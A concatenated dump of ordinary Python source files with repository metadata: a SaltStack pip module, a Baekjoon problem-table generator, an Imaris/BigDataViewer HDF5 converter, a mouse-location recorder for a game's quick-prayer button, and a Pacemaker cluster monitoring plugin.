    cmd = '{0} install'.format(_get_pip_bin(bin_env))

    if pkgs:
        # pip takes a space-separated package list on the command line
        pkg = pkgs.replace(",", " ")
        cmd = '{cmd} {pkg} '.format(
            cmd=cmd, pkg=pkg)

    treq = None
    if requirements:
        if requirements.startswith('salt://'):
            # Cache the salt:// requirements file to a local temp file;
            # pip cannot read from the salt fileserver directly.
            req = __salt__['cp.cache_file'](requirements)
            fd_, treq = tempfile.mkstemp()
            os.close(fd_)
            shutil.copyfile(req, treq)
        else:
            treq = requirements
        cmd = '{cmd} --requirement "{requirements}" '.format(
            cmd=cmd, requirements=treq or requirements)

    if treq is not None and runas:
        # Make sure the runas user can read the cached requirements file.
        logger.debug(
            'Changing ownership of requirements file \'{0}\' to '
            'user \'{1}\''.format(treq, runas)
        )
        __salt__['file.chown'](treq, runas, None)

    if log:
        # Bug fix (implements the old TODO): os.path.exists() never raises
        # IOError, so the previous try/except could never fire. Check
        # writability of an existing log file explicitly instead.
        if os.path.exists(log) and not os.access(log, os.W_OK):
            raise IOError('\'{0}\' is not writeable'.format(log))
        cmd = '{cmd} --log {log} '.format(
            cmd=cmd, log=log)

    if proxy:
        cmd = '{cmd} --proxy={proxy} '.format(
            cmd=cmd, proxy=proxy)

    if timeout:
        # Validate early so pip does not fail with a cryptic error.
        try:
            int(timeout)
        except ValueError:
            raise ValueError(
                '\'{0}\' is not a valid integer base 10.'.format(timeout)
            )
        cmd = '{cmd} --timeout={timeout} '.format(
            cmd=cmd, timeout=timeout)

    if editable:
        # pip requires an #egg= fragment to name an editable checkout
        if editable.find('egg') == -1:
            raise Exception('You must specify an egg for this editable')
        cmd = '{cmd} --editable={editable} '.format(
            cmd=cmd, editable=editable)

    if find_links:
        if not find_links.startswith("http://"):
            raise Exception('\'{0}\' must be a valid url'.format(find_links))
        cmd = '{cmd} --find-links={find_links}'.format(
            cmd=cmd, find_links=find_links)

    if index_url:
        if not index_url.startswith("http://"):
            raise Exception('\'{0}\' must be a valid url'.format(index_url))
        cmd = '{cmd} --index-url="{index_url}" '.format(
            cmd=cmd, index_url=index_url)

    if extra_index_url:
        if not extra_index_url.startswith("http://"):
            raise Exception(
                '\'{0}\' must be a valid url'.format(extra_index_url)
            )
        # Bug fix: pip's flag is --extra-index-url, not --extra-index_url
        cmd = '{cmd} --extra-index-url="{extra_index_url}" '.format(
            cmd=cmd, extra_index_url=extra_index_url)

    if no_index:
        cmd = '{cmd} --no-index '.format(cmd=cmd)

    if mirrors:
        if not mirrors.startswith("http://"):
            raise Exception('\'{0}\' must be a valid url'.format(mirrors))
        cmd = '{cmd} --use-mirrors --mirrors={mirrors} '.format(
            cmd=cmd, mirrors=mirrors)

    if build:
        cmd = '{cmd} --build={build} '.format(
            cmd=cmd, build=build)

    if target:
        cmd = '{cmd} --target={target} '.format(
            cmd=cmd, target=target)

    if download:
        cmd = '{cmd} --download={download} '.format(
            cmd=cmd, download=download)

    if download_cache:
        # Bug fix: pip's flag is --download-cache, not --download_cache
        cmd = '{cmd} --download-cache={download_cache} '.format(
            cmd=cmd, download_cache=download_cache)

    if source:
        cmd = '{cmd} --source={source} '.format(
            cmd=cmd, source=source)

    if upgrade:
        cmd = '{cmd} --upgrade '.format(cmd=cmd)

    if force_reinstall:
        cmd = '{cmd} --force-reinstall '.format(cmd=cmd)

    if ignore_installed:
        cmd = '{cmd} --ignore-installed '.format(cmd=cmd)

    if no_deps:
        cmd = '{cmd} --no-deps '.format(cmd=cmd)

    if no_install:
        cmd = '{cmd} --no-install '.format(cmd=cmd)

    if no_download:
        cmd = '{cmd} --no-download '.format(cmd=cmd)

    if install_options:
        # Bug fix: pip's flag is --install-option (singular), as the
        # docstring above already documents.
        cmd = '{cmd} --install-option={install_options} '.format(
            cmd=cmd, install_options=install_options)

    try:
        result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
    finally:
        # Always remove the cached temp requirements file, even on failure.
        if treq:
            try:
                os.remove(treq)
            except Exception:
                pass

    return result
def uninstall(pkgs=None,
              requirements=None,
              bin_env=None,
              log=None,
              proxy=None,
              timeout=None,
              runas=None,
              cwd=None):
    '''
    Uninstall packages with pip

    Uninstall packages individually or from a pip requirements file. Uninstall
    packages globally or from a virtualenv.

    pkgs
        comma separated list of packages to install
    requirements
        path to requirements
    bin_env
        path to pip bin or path to virtualenv. If doing an uninstall from
        the system python and want to use a specific pip bin (pip-2.7,
        pip-2.6, etc..) just specify the pip bin you want.
        If uninstalling from a virtualenv, just use the path to the virtualenv
        (/home/code/path/to/virtualenv/)
    log
        Log file where a complete (maximum verbosity) record will be kept
    proxy
        Specify a proxy in the form
        user:passwd@proxy.server:port. Note that the
        user:password@ is optional and required only if you
        are behind an authenticated proxy. If you provide
        user@proxy.server:port then you will be prompted for a
        password.
    timeout
        Set the socket timeout (default 15 seconds)
    runas
        User to run pip as
    cwd
        Current working directory to run pip from

    CLI Example::

        salt '*' pip.uninstall <package name>,<package2 name>
        salt '*' pip.uninstall requirements=/path/to/requirements.txt
        salt '*' pip.uninstall <package name> bin_env=/path/to/virtualenv
        salt '*' pip.uninstall <package name> bin_env=/path/to/pip_bin
    '''
    cmd = '{0} uninstall -y '.format(_get_pip_bin(bin_env))

    if pkgs:
        pkg = pkgs.replace(",", " ")
        cmd = '{cmd} {pkg} '.format(
            cmd=cmd, pkg=pkg)

    treq = None
    if requirements:
        if requirements.startswith('salt://'):
            # Cache the salt:// requirements file locally (mirrors install())
            req = __salt__['cp.cache_file'](requirements)
            fd_, treq = tempfile.mkstemp()
            os.close(fd_)
            shutil.copyfile(req, treq)
        # Bug fix: pip's flag is --requirement (or -r), not --requirements
        cmd = '{cmd} --requirement "{requirements}" '.format(
            cmd=cmd, requirements=treq or requirements)

    if treq is not None and runas:
        # Consistency with install(): the runas user must be able to read
        # the cached requirements file.
        logger.debug(
            'Changing ownership of requirements file \'{0}\' to '
            'user \'{1}\''.format(treq, runas)
        )
        __salt__['file.chown'](treq, runas, None)

    if log:
        # Bug fix (implements the old TODO): os.path.exists() never raises
        # IOError; check writability of an existing log file explicitly.
        if os.path.exists(log) and not os.access(log, os.W_OK):
            raise IOError('\'{0}\' is not writeable'.format(log))
        # Bug fix: was '--{log}', which rendered as e.g. '--/var/log/pip.log'
        cmd = '{cmd} --log {log} '.format(
            cmd=cmd, log=log)

    if proxy:
        cmd = '{cmd} --proxy={proxy} '.format(
            cmd=cmd, proxy=proxy)

    if timeout:
        try:
            int(timeout)
        except ValueError:
            raise ValueError(
                '\'{0}\' is not a valid integer base 10.'.format(timeout)
            )
        cmd = '{cmd} --timeout={timeout} '.format(
            cmd=cmd, timeout=timeout)

    try:
        result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
    finally:
        # Consistency with install(): clean the temp file up even on failure.
        if treq:
            try:
                os.remove(treq)
            except Exception:
                pass

    return result
def freeze(bin_env=None,
           runas=None,
           cwd=None):
    '''
    Return a list of installed packages either globally or in the specified
    virtualenv

    bin_env
        path to pip bin or path to virtualenv. If doing an uninstall from
        the system python and want to use a specific pip bin (pip-2.7,
        pip-2.6, etc..) just specify the pip bin you want.
        If uninstalling from a virtualenv, just use the path to the virtualenv
        (/home/code/path/to/virtualenv/)
    runas
        User to run pip as
    cwd
        Current working directory to run pip from

    CLI Example::

        salt '*' pip.freeze /home/code/path/to/virtualenv/
    '''
    pip_bin = _get_pip_bin(bin_env)
    # A virtualenv's 'activate' script is expected to live next to pip.
    activate = os.path.join(os.path.dirname(pip_bin), 'activate')
    if not os.path.isfile(activate):
        raise CommandExecutionError(
            "Could not find the path to the virtualenv's 'activate' binary"
        )
    # NOTE(review): 'source' is a bash builtin; if cmd.run_all executes this
    # through /bin/sh it may fail where sh is not bash -- confirm.
    cmd = 'source {0}; {1} freeze'.format(activate, pip_bin)
    result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
    if result['retcode'] > 0:
        raise CommandExecutionError(result['stderr'])
    # One 'name==version' (or '-e ...') entry per line of pip's output.
    return result['stdout'].split('\n')
def list(prefix='',
         bin_env=None,
         runas=None,
         cwd=None):
    '''
    Filter list of installed apps from ``freeze`` and check to see if
    ``prefix`` exists in the list of packages installed.

    CLI Example::

        salt '*' pip.list salt
    '''
    # NOTE: intentionally shadows the builtin ``list`` -- salt execution
    # modules are addressed as ``pip.list``; the builtin is not used below.
    packages = {}
    cmd = '{0} freeze'.format(_get_pip_bin(bin_env))
    result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
    if result['retcode'] > 0:
        raise CommandExecutionError(result['stderr'])
    for line in result['stdout'].split('\n'):
        if line.startswith('-e'):
            # Editable install line: '-e <url>#egg=<name>' -> {name: url}
            line = line.split('-e ')[1]
            line, name = line.split('#egg=')
            # NOTE(review): editable packages are returned even when they do
            # not match ``prefix`` -- confirm whether that is intended.
            packages[name] = line
        elif len(line.split("==")) >= 2:
            name = line.split("==")[0]
            version = line.split("==")[1]
            if prefix:
                # case-insensitive prefix filter on the full freeze line
                if line.lower().startswith(prefix.lower()):
                    packages[name] = version
            else:
                packages[name] = version
    return packages
| 31.27686 | 147 | 0.593605 |
201709cde10677f321898e3ca43a3bb6619c6bd2 | 3,844 | py | Python | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | null | null | null | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | null | null | null | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | 1 | 2021-07-07T05:52:50.000Z | 2021-07-07T05:52:50.000Z | import sys
def checkData(data):
    """Return True when any row does not have exactly 5 fields.

    Prints the index of the first offending row before returning.
    (Original comment, Korean: "min, max 2".)
    """
    lengths_ok = [len(row) == 5 for row in data]
    has_bad_row = not all(lengths_ok)
    if has_bad_row:
        print(lengths_ok.index(False))
    return has_bad_row
def urllevel(name):
    """Render a solved.ac tier badge <img> tag for a tier name like 'Gold3'.

    ``name`` is the tier word (full name or one-letter abbreviation, case
    insensitive) immediately followed by the tier number 1-5.
    """
    name, number = name.lower()[:-1], name[-1]
    # Bug fix: accept the correct spelling "silver" (the table previously
    # only contained the misspelling "sliver", which is still tolerated
    # below for backward compatibility).
    nameDB = ["bronze", "silver", "gold", "platinum", "diamond", "ruby"]
    nameDB2 = ["b", "s", "g", "p", "d", "r"]
    if name == "sliver":
        name = "silver"
    LEVEL = 0
    if name in nameDB:
        LEVEL = nameDB.index(name)
    else:
        LEVEL = nameDB2.index(name)
    # solved.ac tier icon index: 1 (Bronze V) .. 30 (Ruby I)
    url = f"https://static.solved.ac/tier_small/{LEVEL * 5 + 6 - int(number)}.svg"
    # NOTE: the stray '=' in width="25px=" is a typo, but DataForm.__lt__
    # slices this exact string at fixed character offsets, so it is
    # preserved deliberately to keep sorting working.
    ret = f"<img height=\"25px\" width=\"25px=\" src=\"{url}\"/>"
    return ret
def urlproblem(number, name):
    """Anchor tag linking *name* to Baekjoon problem *number* (new tab)."""
    href = f"http://boj.kr/{number}"
    return f'<a href="{href}" target="_blank">{name}</a>'
def urlSolution(url):
    """Anchor tag to the solution *url*, or '' when no link was provided."""
    has_link = url != ""
    return f'<a href="{url}">바로가기</a>' if has_link else ""
class DataForm:
    # One table row: recommendation flag, name, difficulty badge, solution
    # link, etc., all stored as already-rendered HTML/markdown fragments.
    def __init__(self):
        self.data = { "id": "", "rec": "", "name": "", "level": "", "url": "", "problemID": ""}
    def addItem(self, key, value):
        # Returns (error_flag, message); False means the value was stored.
        if not key in self.data.keys():
            return True, "Key error"
        self.data[key] = value
        return False, ""
    def getItem(self, key):
        # Returns (error_flag, value); callers index [1] for the value.
        if not key in self.data.keys():
            return True, "Key error"
        return False, self.data[key]
    def __lt__(self, other):
        # Recommended rows sort before non-recommended; ties break on tier.
        if self.data["rec"] == other.getItem("rec")[1]:
            # Slices the numeric tier index out of the <img> HTML produced
            # by urllevel() at fixed character offsets -- fragile: breaks if
            # urllevel's output format changes by even one character.
            L = int( self.data["level"][74:][:-7])
            R = int(other.data["level"][74:][:-7])
            return L < R
        return self.data["rec"] != ''
    def __repr__(self):
        # Render the row as one markdown table line.
        ID = self.data["id"]
        REC = ":heavy_check_mark:" if self.data["rec"] != '' else " "
        NAME = self.data["name"]
        LEVEL = self.data["level"]
        URL = self.data["url"]
        PROBLEMID = self.data["problemID"]
        PRINT_STR = f"| {ID:02} | {REC:^20} | {PROBLEMID:^7} | {NAME:^20} | {LEVEL:^15} | {URL:^20} |"
        return PRINT_STR
class Table:
    # Column headers (Korean: index / recommended / problem number /
    # problem name / difficulty / solution link) and the matching DataForm
    # keys, in display order.
    title = [ "순번", "추천 문제", "문제 번호", "문제 이름", "난이도", "풀이 링크" ]
    keys = [ "id", "rec", "problemID", "name", "level", "url" ]
    def __init__(self):
        self.Lines = list()
    def makeForm(self, data):
        # data layout: [recommended-flag, name, problem-number, level, url]
        # NULL | Not NULL | Not NULL | Not NULL | Not NULL
        ret = dict()
        ret[self.keys[1]] = data[0]
        ret[self.keys[2]] = urlproblem(data[2], data[2])
        ret[self.keys[3]] = urlproblem(data[2], data[1])
        ret[self.keys[4]] = urllevel(data[3])
        ret[self.keys[5]] = urlSolution(data[4])
        return ret
    def putLine(self, data):
        # Wrap a makeForm() dict into a DataForm row; reject non-dicts.
        if not type(data) == dict:
            return True, "Type Error"
        newData = DataForm()
        for k, v in data.items():
            newData.addItem(k, v)
        self.Lines.append(newData)
    def sort(self):
        # Order rows (recommended first, then by difficulty -- see
        # DataForm.__lt__) and renumber the id column sequentially.
        self.Lines = sorted(self.Lines)
        N = len(self.Lines)
        for i in range(N):
            self.Lines[i].addItem("id", i)
    def print(self):
        # Emit the markdown table: header, separator, then each row.
        A,B,C,D,E,F = self.title
        print(f"| {A:^20} | {B:^20} | {C:^20} | {D:^20} | {E:^20} | {F:^20} |")
        print(f"| :-----: | :-----: | :-----: | :-----: | :-----: | :-----: |")
        N = len(self.Lines)
        for i in range(N):
            print(self.Lines[i])
if __name__=="__main__":
    # Read CSV-ish rows from stdin and print a markdown problem table.
    Input = sys.stdin.readlines()
    data = list()
    # V,N,PN,L,S
    for i in Input:
        Line = list(map(str, i.strip().split(",")))
        # Re-join commas that belong to the problem name itself: everything
        # between the first field and the last three fields is the name.
        NAME = ','.join(Line[:-3][1:])
        Line = Line[:1] + [ NAME ] + Line[-3:]
        data.append(Line)
    # data = [ list(map(str, i.strip().split(","))) for i in Input ]
    # Check Data
    assert(not checkData(data))
    outputTable = Table()
    for i in data:
        curLine = outputTable.makeForm(i)
        outputTable.putLine(curLine)
    outputTable.sort()
    outputTable.print()
| 29.569231 | 102 | 0.502862 |
c37ee4d0134da1282567998cfea137d3c1ead503 | 7,213 | py | Python | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 9 | 2018-05-31T12:01:56.000Z | 2020-03-23T13:11:29.000Z | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 3 | 2018-05-30T21:12:47.000Z | 2020-08-19T20:53:06.000Z | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 4 | 2018-09-21T02:11:13.000Z | 2020-08-11T12:39:22.000Z | import os
import h5py
import numpy as np
from xml.etree import ElementTree as ET
from .util import subsample_data
def np_to_bdv(array,
              fname='myfile',
              subsamp=((1, 1, 1), (1, 2, 2)),
              chunks=((4, 32, 32), (16, 16, 16)),
              compression='gzip'
              ):
    # Write ``array`` to a BigDataViewer-style HDF5 file plus an XML header.
    # ``subsamp`` and ``chunks`` are per-resolution-level (Z, Y, X)
    # subsampling factors and chunk shapes; they must be the same length.
    assert len(subsamp) == len(chunks)
    assert all([len(i) == 3 for i in subsamp]), 'Only deal with 3D chunks'
    assert all([len(i) == len(x) for i, x in zip(subsamp, chunks)])
    assert compression in (None, 'gzip', 'lzf', 'szip'), 'Unknown compression type'
    fname = os.path.splitext(fname)[0] + '.h5'
    # force 5D
    # TODO: configure/rearrange axes
    # for now... assume TCZYX axis order
    if not array.ndim == 5:
        array = array.reshape(tuple([1] * (5 - array.ndim)) + array.shape)
    nt, nc, nz, ny, nx = array.shape
    nr = len(subsamp)
    with h5py.File(fname, 'a') as hf:
        hf['__DATA_TYPES__/Enum_Boolean'] = np.dtype('bool')
        # hf['__DATA_TYPES__/String_VariableLength'] = h5py.special_dtype(vlen=np.dtype('O'))
        # One setup group per channel holding the resolution metadata.
        for c in range(nc):
            grp = hf.create_group('s{:02d}'.format(c))
            # resolutions and subdivisions require XYZ axis order
            grp.create_dataset('resolutions', data=np.fliplr(np.array(subsamp)),
                               dtype='<f8',
                               chunks=np.array(subsamp).shape,
                               maxshape=(None, None))
            grp.create_dataset('subdivisions', data=np.fliplr(np.array(chunks)),
                               dtype='<i4',
                               chunks=np.array(chunks).shape,
                               maxshape=(None, None))
        # BDV group layout: t{timepoint}/s{setup}/{resolution}/cells
        fmt = 't{:05d}/s{:02d}/{}'
        for t in range(nt):
            for c in range(nc):
                data = np.squeeze(array[t, c]).astype(np.uint16)
                for r in range(nr):
                    grp = hf.create_group(fmt.format(t, c, r))
                    subdata = subsample_data(data, subsamp[r])
                    # scaleoffset=0 gives lossless integer packing
                    grp.create_dataset('cells', data=subdata,
                                       chunks=chunks[r],
                                       maxshape=(None, None, None),
                                       scaleoffset=0,
                                       compression=compression)
    # Companion XML describing setups/timepoints/registrations for BDV.
    write_bdv_xml(fname, array.shape)
    return
def detect_ims_shape(hf):
    # will be populated with shape (nt, nc, nz, ny, nx) of dataset
    shape = [1, 0, 0, 0, 0]
    # Imaris attribute names (lower-cased) mapped to their index in ``shape``
    KEYS = {
        'x': 4,
        'y': 3,
        'z': 2,
        'numberofchannels': 1,
        'noc': 1,
        'datasettimepoints': 0,
        'filetimepoints': 0,
    }
    def visitor(x, y):
        # h5py visititems callback: scan every object's attributes for the
        # Imaris size keys. Imaris stores the values as character arrays.
        for name, value in y.attrs.items():
            if name.lower() in KEYS:
                # NOTE(review): ndarray.tostring() is deprecated in modern
                # numpy in favor of tobytes() -- confirm the numpy floor.
                shape[KEYS[name.lower()]] = int(value.tostring().decode('ASCII'))
    hf.visititems(visitor)
    return shape
def map_imaris_names_to_bdv(hf):
    """ Takes an Imaris file and creates required links for BDV compatibility"""
    shape = detect_ims_shape(hf)
    assert all([x > 0 for x in shape[-3:]]), 'Could not detect 3D volume size in HD5 file'
    # Fall back to counting channel groups when the attribute was absent.
    if shape[1] == 0:
        shape[1] = len(hf['DataSet/ResolutionLevel 0/TimePoint 0'])
    if shape[1] == 0:
        # Last resort: probe 'DataSetInfo/Channel N' groups until one is missing.
        while True:
            if bool(hf.get('DataSetInfo/Channel {}'.format(shape[1]))):
                shape[1] += 1
            else:
                break
    assert shape[1] > 0, 'Could not detect number of channels in HD5 file'
    # detect number of resolution levels
    nr = 0
    while True:
        if bool(hf.get('DataSet/ResolutionLevel {}'.format(nr))):
            nr += 1
        else:
            break
    # detect subsampling and chunking rates
    ress = np.empty((nr, 3))
    subs = np.empty_like(ress)
    for r in range(nr):
        d = hf.get('DataSet/ResolutionLevel {}/TimePoint 0/Channel 0/Data'.format(r))
        # subsampling factor = full volume size / this level's dataset size
        ress[r] = np.divide(shape[-3:], d.shape).astype(int)
        subs[r] = d.chunks
        assert d.dtype in (np.uint16, np.int16), 'BDV only supports 16 bit files'
    # write BDV-required datasets
    for c in range(shape[1]):
        grp = hf.require_group('s{:02d}'.format(c))
        # resolutions and subdivisions require XYZ axis order
        grp.require_dataset('resolutions', ress.shape, data=np.fliplr(ress), dtype='<f8',
                            chunks=ress.shape, maxshape=(None, None))
        grp.require_dataset('subdivisions', subs.shape, data=np.fliplr(subs), dtype='<i4',
                            chunks=subs.shape, maxshape=(None, None))
    # perform dataset linking between Imaris and BDV formats
    ims_fmt = '/DataSet/ResolutionLevel {}/TimePoint {}/Channel {}/Data'
    bdv_fmt = 't{:05d}/s{:02d}/{}/cells'
    for t in range(shape[0]):
        for c in range(shape[1]):
            for r in range(nr):
                if not bdv_fmt.format(t, c, r) in hf:
                    # hard link the existing Imaris dataset under the BDV name
                    hf[bdv_fmt.format(t, c, r)] = hf[ims_fmt.format(r, t, c)]
                    # hf[bdv_fmt.format(t, c, r)] = h5py.SoftLink(ims_fmt.format(r, t, c))
    # create the XML file for BDV
    write_bdv_xml(hf.filename, shape)
    return
def write_bdv_xml(fname, imshape, dx=0.1, dy=0.1, dz=0.25):
    """Write the BigDataViewer XML companion file for an HDF5 dataset.

    ``imshape`` is the 5D (nt, nc, nz, ny, nx) shape of the volume stored in
    ``fname``; ``dx``/``dy``/``dz`` give the voxel size in microns. The XML
    is written next to ``fname`` with a ``.xml`` extension.
    """
    nt, nc, nz, ny, nx = tuple(imshape)

    root = ET.Element('SpimData', {'version': '0.2'})
    base = ET.SubElement(root, 'BasePath', {'type': 'relative'})
    base.text = '.'

    sequence = ET.SubElement(root, 'SequenceDescription')
    loader = ET.SubElement(sequence, 'ImageLoader', {'format': 'bdv.hdf5'})
    h5ref = ET.SubElement(loader, 'hdf5', {'type': 'relative'})
    h5ref.text = os.path.basename(fname)

    # One ViewSetup per channel, plus the channel attribute table.
    setups = ET.SubElement(sequence, 'ViewSetups')
    channel_attrs = ET.SubElement(setups, 'Attributes', {'name': 'channel'})
    for chan in range(nc):
        setup = ET.SubElement(setups, 'ViewSetup')
        ET.SubElement(setup, 'id').text = str(chan)
        ET.SubElement(setup, 'name').text = 'channel {}'.format(chan + 1)
        ET.SubElement(setup, 'size').text = ' '.join(str(v) for v in (nx, ny, nz))
        voxel = ET.SubElement(setup, 'voxelSize')
        ET.SubElement(voxel, 'unit').text = 'micron'
        ET.SubElement(voxel, 'size').text = ' '.join(str(v) for v in (dx, dy, dz))
        attributes = ET.SubElement(setup, 'attributes')
        ET.SubElement(attributes, 'channel').text = str(chan + 1)
        entry = ET.SubElement(channel_attrs, 'Channel')
        ET.SubElement(entry, 'id').text = str(chan + 1)
        ET.SubElement(entry, 'name').text = str(chan + 1)

    timepoints = ET.SubElement(sequence, 'Timepoints', {'type': 'range'})
    ET.SubElement(timepoints, 'first').text = str(0)
    ET.SubElement(timepoints, 'last').text = str(nt - 1)

    # A per-(timepoint, setup) affine registration scaling by voxel size.
    registrations = ET.SubElement(root, 'ViewRegistrations')
    for t in range(nt):
        for chan in range(nc):
            reg = ET.SubElement(registrations, 'ViewRegistration',
                                {'timepoint': str(t), 'setup': str(chan)})
            transform = ET.SubElement(reg, 'ViewTransform', {'type': 'affine'})
            ET.SubElement(transform, 'affine').text = (
                '{0} 0.0 0.0 0.0 0.0 {1} 0.0 0.0 0.0 0.0 {2} 0.0'.format(dx, dy, dz))

    ET.ElementTree(root).write(os.path.splitext(fname)[0] + '.xml')
| 38.164021 | 112 | 0.549841 |
8940cb423adffcc9edb1d3b0ab37e5196834169a | 1,318 | py | Python | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | from primitives.click_location import ClickLocation
from pynput import keyboard, mouse
import logging
import pickle
import random
import pyautogui
from functools import partial
import time
quick_pray_location = None
logger = logging.getLogger(__name__)
def on_press(key):
    # pynput keyboard callback: stop the listener once Esc is pressed.
    if key == keyboard.Key.esc:
        logger.critical("Escape pressed. Done setting up quick pray location.")
        # returning False exits the handler.
        return False
def on_click(x, y, button, pressed):
    '''
    listens only for right clicks.
    '''
    # Ignore everything except the press (not release) of the right button.
    if button != mouse.Button.right or pressed is False:
        return
    # Stash the capture in a module global; get_quick_pray_location()
    # pickles it once the listeners shut down.
    global quick_pray_location
    logger.info("Recorded click location.")
    quick_pray_location = ClickLocation(x, y, margin_for_error_px=3)
def log_instructions():
    # Tell the user how to drive the interactive capture session.
    logger.info("Right click once on the quick-prayer location.")
    logger.info("Press esc, when complete.")
def get_quick_pray_location(filename='quick_pray_location.pickle'):
    """Interactively capture the quick-prayer click location and pickle it.

    Blocks until the user right-clicks the location (recorded by
    ``on_click``) and presses Esc (which ends ``on_press``'s listener),
    then writes the captured ``ClickLocation`` to *filename*.

    :param filename: path of the pickle file to write. Defaults so the
        module-level ``__main__`` call (which passes no argument, and
        previously raised TypeError) works.
    """
    log_instructions()
    # The keyboard listener exits when on_press returns False (Esc); the
    # nested mouse listener records right-clicks in the meantime.
    with keyboard.Listener(on_press=on_press) as keyboard_listener:
        with mouse.Listener(on_click=on_click):
            keyboard_listener.join()
    logger.info(f"Captured quick pray location: {quick_pray_location}")
    with open(filename, "wb") as f:
        pickle.dump(quick_pray_location, f)
    # Bug fix: the message previously logged a garbled placeholder instead
    # of interpolating the output path.
    logger.info(f"Wrote quick pray location to file: {filename}")
if __name__ == '__main__':
    # NOTE(review): called without an argument even though
    # get_quick_pray_location requires ``filename`` as written above --
    # this raises TypeError; confirm the intended output path.
    get_quick_pray_location()
1f758f18f5346233439322bdf35a4dbcc6852c54 | 3,612 | py | Python | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 31 | 2015-01-03T10:30:56.000Z | 2019-06-23T22:21:24.000Z | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 457 | 2015-01-01T15:58:47.000Z | 2021-06-10T12:04:11.000Z | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 65 | 2015-03-02T02:39:59.000Z | 2021-12-22T21:57:01.000Z | #!/usr/bin/env python3
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import re
from maas_common import metric
from maas_common import print_output
from maas_common import status_err
from maas_common import status_ok
from maas_common import MaaSException
# Raised when a `pcs` invocation produces no usable output.
class BadOutputError(MaaSException):
    pass
def check_command(command, param1, param2=None):
    """Run ``command param1 [param2]`` and return its decoded stdout.

    Calls ``status_err`` and raises ``BadOutputError`` when the command
    produces no output at all.
    """
    if param2:
        output = subprocess.check_output([command, param1, param2])
    else:
        output = subprocess.check_output([command, param1])
    if not output:
        status_err('No output received from pacemaker. Cannot gather metrics.')
        # Bug fix: this raise was dedented out of the ``if`` above, so every
        # call raised and the return below was unreachable.
        raise BadOutputError(
            'The output was not in the expected format:\n%s' % output)
    return output.decode()
# determine nodes status, call "pcs status nodes" command
def get_nodes_status():
    # Emit one metric per standby/offline node list, or a single OK metric.
    output = check_command('pcs', 'status', 'nodes')
    lines = output.split('\n')
    has_metrics = False
    for line in lines:
        if line.strip().startswith('Standby') or line.strip().startswith(
                'Offline'):
            # lines look like 'Standby: node1 node2' -- the node list is
            # everything after the colon.
            splitline = line.strip().split(': ')
            if len(splitline) > 1:
                message = "Pacemaker node standby/offline: " + splitline[1]
                metric('pacemaker_status_nodes', 'string', message)
                has_metrics = True
    if not has_metrics:
        metric('pacemaker_status_nodes', 'string',
               "Pacemaker node status is OK")
# check "pcs status". If there are any failures, warnings, or notices,
# return the whole output.
def check_for_failed_actions():
    # Emit a single error/OK metric depending on whether the full
    # ``pcs status`` output mentions any problem keyword.
    output = check_command('pcs', 'status')
    pattern = re.compile(
        "Failed|Stopped|Notice|Fail|Error|Warning|Faulty", flags=re.IGNORECASE)
    bad_things_happened = re.search(pattern, output)
    if bad_things_happened:
        metric('pacemaker_failed_actions', 'string',
               'Errors in pacemaker cluster')
    else:
        metric('pacemaker_failed_actions', 'string', 'Pacemaker cluster is OK')
def check_for_failed_resources():
    """Emit one metric per stopped pacemaker resource, or a single OK metric.

    In ``pcs status resources`` output a 'Stopped' line follows the line
    naming the affected resource, so the preceding line is reported.
    """
    output = check_command('pcs', 'status', 'resources')
    pattern = re.compile(
        "Failed|Stopped|Notice|Fail|Error|Warning|Faulty", flags=re.IGNORECASE)
    bad_things_happened = re.search(pattern, output)
    has_metrics = False
    if bad_things_happened:
        lines = output.split('\n')
        # Bug fix: the original used py2-only ``xrange`` under a python3
        # shebang, which raises NameError at runtime.
        for index in range(len(lines)):
            if lines[index].strip().startswith('Stopped'):
                # Bug fix: guard index 0, where lines[index - 1] would wrap
                # around to the *last* line of the output.
                if index > 0 and lines[index - 1]:
                    message = "Stopped resource: " + lines[index - 1]
                    metric('pacemaker_resource_stop', 'string', message)
                    has_metrics = True
    if has_metrics is False:
        metric('pacemaker_resource_stop', 'string',
               "Pacemaker resources are OK")
if __name__ == '__main__':
    # Run all pacemaker checks; any exception is reported through
    # status_err, otherwise the plugin reports overall OK.
    with print_output():
        try:
            get_nodes_status()
            check_for_failed_actions()
            check_for_failed_resources()
        except Exception as e:
            status_err(e)
        else:
            status_ok()
| 31.684211 | 79 | 0.6567 |
